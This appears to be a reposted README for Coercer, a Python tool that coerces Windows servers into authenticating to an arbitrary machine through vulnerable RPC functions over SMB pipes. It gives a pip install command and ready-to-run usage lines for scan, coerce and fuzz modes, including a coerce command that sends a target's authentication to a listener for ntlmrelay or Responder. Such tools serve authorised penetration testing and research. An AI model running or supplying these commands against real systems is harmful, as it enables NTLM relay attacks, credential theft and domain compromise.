Coercer

A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.

Features:

Lists open SMB pipes on the remote machine (in modes scan authenticated and fuzz authenticated)
Tries to connect on a list of known SMB pipes on the remote machine (in modes scan unauthenticated and fuzz unauthenticated)
Calls one by one all the vulnerable RPC functions to coerce the server to authenticate on an arbitrary machine.
Random UNC paths generation to avoid caching failed attempts (all modes)
Configurable delay between attempts with --delay

More feature information here.

Install: (pip)

sudo python3 -m pip install coercer

Usage:

# Scan mode (Assess the Remote Procedure Calls listening on a machine)
./Coercer.py scan -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v

# Coerce mode (Exploit the Remote Procedure Calls on a remote machine to coerce an authentication to ntlmrelay or responder)
./Coercer.py coerce -l 192.168.1.2 -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v

# Fuzz mode (Fuzz Remote Procedure Calls listening on a machine)
./Coercer.py fuzz -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v

IT news & Information Technology Comparison

Coercer

Recent Posts

Comments